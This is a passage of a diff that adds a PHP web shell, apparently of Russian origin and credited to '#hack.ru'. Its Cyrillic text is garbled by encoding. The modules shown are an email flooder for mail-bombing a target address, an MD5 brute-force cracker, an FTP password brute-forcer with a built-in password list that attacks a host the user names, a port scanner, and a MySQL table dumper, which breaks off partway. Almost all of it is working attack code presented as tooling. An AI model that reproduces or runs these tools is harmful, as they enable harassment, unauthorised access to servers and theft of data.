+<tr><td align=center class=pagetitle><b>������ Email</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>��� �� ����������, ��� ������� � ���������, �� ��������� ���������� �� ���������� ��� ��� �����������. 
+�� ���� �� ����� ���� ��������, �� �� ����� ��� ���������� �����. ��� ���� ����� � �������� ������ �����. � ������� ���� ����� �� ������� ��������� �������!!!</blockquote>
+</td></tr>
+</table><br>";
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=flud' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>��������� �����:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;��� �������� �����, ������ Email, ������ �� ��� ������: <br>
+ &nbsp;<b>1.</b> Easy Flood - ��� ����� ����, �� ����� �������, �� ��� ����� �������, � ����� ���������� ���� ����� 100000 �����, ��������� ������� ��������� ���<br>
+ &nbsp;<b>2.</b> Hard Flood - ����������� ����, �� ����� ������������, ����������� �� ���� ����, � ����� ����� ��� ���� ������������</td></tr>
+ <tr><td align=left class=pagetitle>&nbsp;&nbsp;<input type='radio' name='check_box' value ='1'>&nbsp;&nbsp; <b>Easy Flood</b></td></tr>
+ <tr><td align=left class=pagetitle>&nbsp;&nbsp;<input type='radio' name='check_box' value ='2'>&nbsp;&nbsp; <b>Hard Flood</b></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='������' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+ 
+if ($check_box == "1"){ 
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=flud&status=easy' method=post>
+ <tr><td align=center class=pagetitle colspan=2><font color=#76A8AB><b> .:Easy Flood:. </b></font></b></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Email ����:</td>
+<td align=left width=250><input class='inputbox' type='text' name='emailflood' size=45></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;���������� �����:</td>
+<td align=left width=250><input class='inputbox' type='text' name='kol' size=15></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;�������� �������� (���):</td>
+<td align=left width=250><input class='inputbox' type='text' name='wait' size=15></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;������ ������ (��):</td>
+<td align=left width=250><input class='inputbox' type='text' name='sizeletter' size=45></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;���� ���������:</td>
+<td align=left width=250><input class='inputbox' type='text' name='subject' size=45></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;����� ������:</td>
+<td align=left width=250><textarea name='body' rows='13' cols='50' class=inputbox> </textarea></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='��������' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+ 
+
+} 
+
+
+ if ($status == "easy"){
+  error_reporting(63); if($emailflood=="") { print
+"<script>history.back(-1);alert('�� ��������� ����: <Email ����>')</script>";exit;}
+ error_reporting(63); if($kol=="") { print
+"<script>history.back(-1);alert('�� ��������� ����: <���������� �����>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('�� ��������� ����: <�������� ��������>')</script>";exit;}
+ error_reporting(63); if($sizeletter=="") { print
+"<script>history.back(-1);alert('�� ��������� ����: <������ ������>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('�� ��������� ����: <���� ���������>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('�� ��������� ����: <���� ������>')</script>";exit;}
+
+ 
+$text=strlen($body)+1; 
+$sizeletter_kb=(1024/$text)*$sizeletter;
+$sizeletter_kb=ceil($sizeletter_kb);
+
+for ($i=1; $i<=$sizeletter_kb; $i++) {
+$msg=$msg.$body." ";
+}
+
+     
+for ($i=1; $i<=$kol; $i++){
+ if($emailflood != "") {
+ 
+@mail($emailflood, $body, $msg, "From: $subject");
+ $sec = $wait * 1000000;
+      usleep($sec);
+	  }
+	 
+}
+
+}
+
+ 
+ }
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+function crypte() {
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>����������� ������</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>�� ������ ������ � ��������� ���������� ��������� ����������� �������� � ��������, ������� ���������� ��������� ������ ���������� �������, 
+� ������� NFM �� ������ �������� ������ � ��������� ���� ������, �� ������ ������ �������� ������ �� ����, ��� ����� � ������ ����� ���������� ������ ����������.</blockquote></td></tr>
+</table>";
+
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>���������� ������ ����������, �������������� ����������� MHASH:</b></td></tr>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>MD5 </b>(����� ���������������� ����� ���������� ������)</td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;���������:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+ <td class=pagetitle width=100>&nbsp;����:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+ 
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>SHA1 </b>(���� �������� ���������� ����� ���������� ������)</td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;���������:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+ <td class=pagetitle width=100>&nbsp;����:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+ 
+ </form></table>";
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;<b>CRC32 </b>(� �������� ������������ ��� ���������� ����������� ���� ��� �������� ����������� ������, �� � � ��������� ������� � �������� �������� �������)</td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;���������:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+ <td class=pagetitle width=100>&nbsp;����:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+ 
+ </form></table>";
+ 
+ }
+
+function decrypte() {
+ global $action,$pass_de,$chars_de,$dat,$date;
+set_time_limit(0);
+ignore_user_abort(1);
+
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>������������� ������</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>���� ��������, ��� md5 ������ ��������� ������������, ��� ��� ������������ ���������������� ���������� (�������� �����������), 
+ ��������� ���������� ��������� �������� ������, � ������ 128-������� (md5). � ��������� ����� ��������� ����������� �� ����� ���������
+ ����������� �������� ������, ������� ���������, � �� �������� ��������� ����� ������� �����, � ������ ������ ������� �� ���������� ������� � �������� ������.</blockquote></td></tr>
+</table>";
+
+if($chars_de==""){$chars_de="";}
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>���������� ������:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;<b>Decrypte MD5</b>(����������� ���� ������� �� ����� ������ � ������� ������������ ����������� �������)</td></tr>
+ <tr>
+ <td class=pagetitle width=400 >&nbsp;MD5 ���:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=�������� class=button1 $style_button></td>
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+  <td class=pagetitle width=120 valign=top><b>������� ����:</b><br><font color=red><b><u>ENG:</u></b></font>
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:�.,&quot;')>[�������]</a><br><br>
+<font color=red><b><u>RUS:</u></b></font>
+<a class=menu href=javascript:ins('��������������������������������')>[�-�]</a>
+<a class=menu href=javascript:ins('�����Ũ��������������������������')>[�-�]</a>
+</td></tr>
+<tr><td align=center width=400>
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+
+
+if($_POST[pass_de]){
+$pass_de=htmlspecialchars($pass_de);
+$pass_de=stripslashes($pass_de);
+$dat=date("H:i:s");
+$date=date("d:m:Y");
+
+crack_md5();
+}
+} 
+
+function crack_md5() {
+global $chars_de;
+$chars=$_POST[chars];
+set_time_limit(0);
+ignore_user_abort(1);
+$chars_de=str_replace("<",chr(60),$chars_de);
+$chars_de=str_replace(">",chr(62),$chars_de);
+$c=strlen($chars_de);
+for ($next = 0; $next <= 31; $next++) {
+for ($i1 = 0; $i1 <= $c; $i1++) {
+$word[1] = $chars_de{$i1};
+for ($i2 = 0; $i2 <= $c; $i2++) {
+$word[2] = $chars_de{$i2};
+if ($next <= 2) {
+result(implode($word));
+}else {
+for ($i3 = 0; $i3 <= $c; $i3++) {
+$word[3] = $chars_de{$i3};
+if ($next <= 3) {
+result(implode($word));
+}else {
+for ($i4 = 0; $i4 <= $c; $i4++) {
+$word[4] = $chars_de{$i4};
+if ($next <= 4) {
+result(implode($word));
+}else {
+for ($i5 = 0; $i5 <= $c; $i5++) {
+$word[5] = $chars_de{$i5};
+if ($next <= 5) {
+result(implode($word));
+}else {
+for ($i6 = 0; $i6 <= $c; $i6++) {
+$word[6] = $chars_de{$i6};
+if ($next <= 6) {
+result(implode($word));
+}else {
+for ($i7 = 0; $i7 <= $c; $i7++) {
+$word[7] = $chars_de{$i7};
+if ($next <= 7) {
+result(implode($word));
+}else {
+for ($i8 = 0; $i8 <= $c; $i8++) {
+$word[8] = $chars_de{$i8};
+if ($next <= 8) {
+result(implode($word));
+}else {
+for ($i9 = 0; $i9 <= $c; $i9++) {
+$word[9] = $chars_de{$i9};
+if ($next <= 9) {
+result(implode($word));
+}else {
+for ($i10 = 0; $i10 <= $c; $i10++) {
+$word[10] = $chars_de{$i10};
+if ($next <= 10) {
+result(implode($word));
+}else {
+for ($i11 = 0; $i11 <= $c; $i11++) {
+$word[11] = $chars_de{$i11};
+if ($next <= 11) {
+result(implode($word));
+}else {
+for ($i12 = 0; $i12 <= $c; $i12++) {
+$word[12] = $chars_de{$i12};
+if ($next <= 12) {
+result(implode($word));
+}else {
+for ($i13 = 0; $i13 <= $c; $i13++) {
+$word[13] = $chars_de{$i13};
+if ($next <= 13) {
+result(implode($word));
+}else {
+for ($i14 = 0; $i14 <= $c; $i14++) {
+$word[14] = $chars_de{$i14};
+if ($next <= 14) {
+result(implode($word));
+}else {
+for ($i15 = 0; $i15 <= $c; $i15++) {
+$word[15] = $chars_de{$i15};
+if ($next <= 15) {
+result(implode($word));
+}else {
+for ($i16 = 0; $i16 <= $c; $i16++) {
+$word[16] = $chars_de{$i16};
+if ($next <= 16) {
+result(implode($word));
+}else {
+for ($i17 = 0; $i17 <= $c; $i17++) {
+$word[17] = $chars_de{$i17};
+if ($next <= 17) {
+result(implode($word));
+}else {
+for ($i18 = 0; $i18 <= $c; $i18++) {
+$word[18] = $chars_de{$i18};
+if ($next <= 18) {
+result(implode($word));
+}else {
+for ($i19 = 0; $i19 <= $c; $i19++) {
+$word[19] = $chars_de{$i19};
+if ($next <= 19) {
+result(implode($word));
+}else {
+for ($i20 = 0; $i20 <= $c; $i20++) {
+$word[20] = $chars_de{$i20};
+if ($next <= 20) {
+result(implode($word));
+}else {
+for ($i21 = 0; $i21 <= $c; $i21++) {
+$word[21] = $chars_de{$i21};
+if ($next <= 21) {
+result(implode($word));
+}else {
+for ($i22 = 0; $i22 <= $c; $i22++) {
+$word[22] = $chars_de{$i22};
+if ($next <= 22) {
+result(implode($word));
+}else {
+for ($i23 = 0; $i23 <= $c; $i23++) {
+$word[23] = $chars_de{$i23};
+if ($next <= 23) {
+result(implode($word));
+}else {
+for ($i24 = 0; $i24 <= $c; $i24++) {
+$word[24] = $chars_de{$i24};
+if ($next <= 24) {
+result(implode($word));
+}else {
+for ($i25 = 0; $i25 <= $c; $i25++) {
+$word[25] = $chars_de{$i25};
+if ($next <= 25) {
+result(implode($word));
+}else {
+for ($i26 = 0; $i26 <= $c; $i26++) {
+$word[26] = $chars_de{$i26};
+if ($next <= 26) {
+result(implode($word));
+}else {
+for ($i27 = 0; $i27 <= $c; $i27++) {
+$word[27] = $chars_de{$i27};
+if ($next <= 27) {
+result(implode($word));
+}else {
+for ($i28 = 0; $i28 <= $c; $i28++) {
+$word[28] = $chars_de{$i28};
+if ($next <= 28) {
+result(implode($word));
+}else {
+for ($i29 = 0; $i29 <= $c; $i29++) {
+$word[29] = $chars_de{$i29};
+if ($next <= 29) {
+result(implode($word));
+}else {
+for ($i30 = 0; $i30 <= $c; $i30++) {
+$word[30] = $chars_de{$i30};
+if ($next <= 30) {
+result(implode($word));
+}else {
+for ($i31 = 0; $i31 <= $c; $i31++) {
+$word[31] = $chars_de{$i31};
+if ($next <= 31) {
+result(implode($word));
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+function result($word) {
+global $dat,$date;
+$pass_de=$_POST[pass_de];
+$dat2=date("H:i:s");
+$date2=date("d:m:Y");
+
+if(md5($word)==$pass_de){ 
+print "
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; ��������� ���������� �������� �������:</td></tr>
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>�������������� ������:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>������ ��������:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>��������� ��������:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;���������� �������� ����� ������� � ����:  <b>".$word."_md5</b></td></tr>
+</table>
+                            ";
+							$f=@fopen($word._md5,"a+");
+                            fputs($f,"��� �� MD5 [$pass_de] = $word\n������ ��������:\t$dat - $date\n��������� ��������:\t$dat2 - $date2\n ");
+                             exit;}
+
+
+
+}
+
+function brut_ftp() {
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>���������� ���</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>� ������� ������� ����������� �� ������� ��������� ������ � ������ �������� ��� �������, ����� ���� ��� ���������� � ������� ����
+�������, ������� ������������ �� ���� ( �� ������ ������� ����� � <b>����������� �������</b> ��� ��� ��� ��������� �������� �� ������ 10000 ������ ������) . </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;<b>Brutforcer Ftp</b>(����������� ����������, ������� �������� �� ������ ����������� �������, ������� ����� �� �����, ���� ������������ ���, �� ������ ���������� ����� ������� � ��� ������� ����������!!!)</td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;����������� �������:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;������ ��� ��������:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Brut FTP' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+ 
+ 
+function s() {
+   $word="qwrtypsdfghjklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+
+function g() {
+   $word="euioam";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+
+function name0() {   return s().g().s();                        }
+function name1() {   return s().g().s().g();                    }
+function name2() {   return s().g().g().s();                    }
+function name3() {   return s().s().g().s().g();                }
+function name4() {   return g().s().g().s().g();                }
+function name5() {   return g().g().s().g().s();                }
+function name6() {   return g().s().s().g().s();                }
+function name7() {   return s().g().g().s().g();                }
+function name8() {   return s().g().s().g().g();                }
+function name9() {   return s().g().s().g().s().g();            }
+function name10() {   return s().g().s().s().g().s().s();        }
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+function randword() {
+   global $cool;
+   $func="name".mt_rand(0,11);
+   $func2="name".mt_rand(0,11);
+   switch (mt_rand(0,11)) {
+      case 0: return $func().mt_rand(5,99);
+      case 1: return $func()."-".$func2();
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+      case 3: return $func()."!".$func();
+      case 4: return randpass(mt_rand(5,12));
+      default: return $func();
+   }
+ 
+ 
+}
+
+function randpass($len) {
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+   $s="";
+   for ($i=0; $i<$len; $i++) {
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+   }
+   return $s;
+}
+if (@unlink("pass.txt") < 0){
+echo "���� ������";
+exit;
+}
+$file="pass.txt"; 
+if($file && $host && $login){
+   $cn=mt_rand(30,30);
+for ($i=0; $i<$cn; $i++) {
+   $s=$cool2[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$s\n");
+   }
+ 
+  $cnt2=mt_rand(43,43);
+for ($i=0; $i<$cnt2; $i++) {
+   $r=$cool[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$login$r\n");
+}    
+$p="$proverka";
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$p\n");
+   
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$u\n");
+  } 
+  
+  if(is_file($file)){
+ $passwd=file($file,1000);
+  for($i=0; $i<count($passwd); $i++){
+   $stop=false;
+   $password=trim($passwd[$i]);
+   $open_ftp=@fsockopen($host,21);
+    if($open_ftp!=false){
+     fputs($open_ftp,"user $login\n");
+     fputs($open_ftp,"pass $password\n");
+     while(!feof($open_ftp) && $stop!=true){
+      $text=fgets($open_ftp,4096);
+      if(preg_match("/230/",$text)){
+       $stop=true;
+	   $f=@fopen($host._ftp,"a+");
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+       echo "
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b><font color=\"blue\">����������!!! ������ ��������.</font></b><br>
+&nbsp;&nbsp;������: <b>$host</b><br>&nbsp;&nbsp;�����: <b>$login</b><br>&nbsp;&nbsp;������: <b>$password</b></td></tr></table>
+";exit;
+      }
+      elseif(preg_match("/530/",$text)){
+       $stop=true;
+      
+      }
+     }
+     fclose($open_ftp);
+   }else{
+    echo "
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>�� ����� ������� ��� ��������!!! �� <b><u>$host</u></b> ������ 21 ����</b></b></td></tr>
+</table>
+";exit;
+   }
+  }
+ }
+}
+
+}
+
+# ��������
+function portscan() {
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+ $mtime = explode(" ",microtime());
+ $mtime = $mtime[1] + $mtime[0];
+ $time1 = $mtime;
+
+ $id = $HTTP_HOST;
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>���������� ������������:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >��������� ������� �� ������� �������� ������" . "...<br></td></tr></table>";
+
+ $lport = $min; 
+ $hport = $max; 
+ $op = 0;
+ $gp = 0;
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4); 
+  if ( !$fp ) { $gp++; }
+  else {
+   $port_addres = $port[$porta];
+   if($port_addres == "") $port_addres = "unknown";
+   $serv = getservbyport($porta, TCP);
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>��� ���?</a>)</td></tr>";
+   $op++;
+  } 
+ } 
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>�� ������ �������� ��� �������� ������</b></td></tr></table>";
+
+ $unsi = ($op/$porta)*100;
+ $unsi = round($unsi);
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>���������� ������������:</b></b></td></tr>";
+ echo "<tr><td align=center width=100% colspan=3><b>���������������� ������:</b>&nbsp;&nbsp;$porta</td></tr>";
+ echo "<tr><td align=center width=100% colspan=3><b>�������� ������:</b>&nbsp;&nbsp;$op</td></tr>";
+ echo "<tr><td align=center width=100% colspan=3><b>�������� ������:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+ $mtime = explode(" ",microtime());
+ $mtime = $mtime[1] + $mtime[0];
+ $time2 = $mtime;
+ $loadtime = ($time2 - $time1); 
+ $loadtime = round($loadtime, 2); 
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>����� ������������:</b>&nbsp;&nbsp;$loadtime ������</tr></table>";
+}
+
+function nfm_copyright() {
+global $action;
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+  
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+// SQL functions start
+function aff_date() {
+ $date_now=date("F j,Y,g:i a");
+ return $date_now;
+} 
+
+function sqldumptable($table) {
+ global $sv_s,$sv_d,$drp_tbl;
+ $tabledump = "";
+ if ($sv_s) {
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; } 
+  $tabledump.="CREATE TABLE $table (\n";
+  $firstfield=1;
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+  while ($champ=mysql_fetch_array($champs)) {
+   if (!$firstfield) { $tabledump.=",\n"; } 
+   else { $firstfield=0;}
+   $tabledump.=" $champ[Field] $champ[Type]";
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";} 
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";} 
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+  }
+  
+  @mysql_free_result($champs);
+  $keys=mysql_query("SHOW KEYS FROM $table");
+  while ($key=mysql_fetch_array($keys)) {
+   $kname=$key['Key_name'];
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+   $index[$kname][]=$key['Column_name'];
+  }
+ 
+  @mysql_free_result($keys);
+  while(list($kname,$columns)=@each($index)) {
+   $tabledump.=",\n";
+   $colnames=implode($columns,",");
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+   else {
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+    $tabledump.=" KEY $kname ($colnames)";
+   }
+  }
+  $tabledump.="\n);\n\n";
+ }
+
+ if ($sv_d) {
+  $rows=mysql_query("SELECT * FROM $table");
+  $numfields=mysql_num_fields($rows);
+  while ($row=mysql_fetch_array($rows)) {
+   $tabledump.="INSERT INTO $table VALUES(";
+   $cptchamp=-1;
+   $firstfield=1;
+   while (++$cptchamp<$numfields) {
+    if (!$firstfield) { $tabledump.=",";} 
+    else { $firstfield=0;}
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";} 
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+   }
+   $tabledump.=");\n";
+  }
+  @mysql_free_result($rows);
+ } 
+
+ return $tabledump;
+} 
+
+function csvdumptable($table) {
+ global $sv_s,$sv_d;
+ $csvdump="## Table:$table \n\n";
+ if ($sv_s) {
+  $firstfield=1;
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+  while ($champ=mysql_fetch_array($champs)) {
+   if (!$firstfield) { $csvdump.=",";} 
+   else { $firstfield=0;}
+   $csvdump.="'".$champ['Field']."'";
+  }
+
+  @mysql_free_result($champs);
+  $csvdump.="\n";
+ }
+
+ if ($sv_d) {
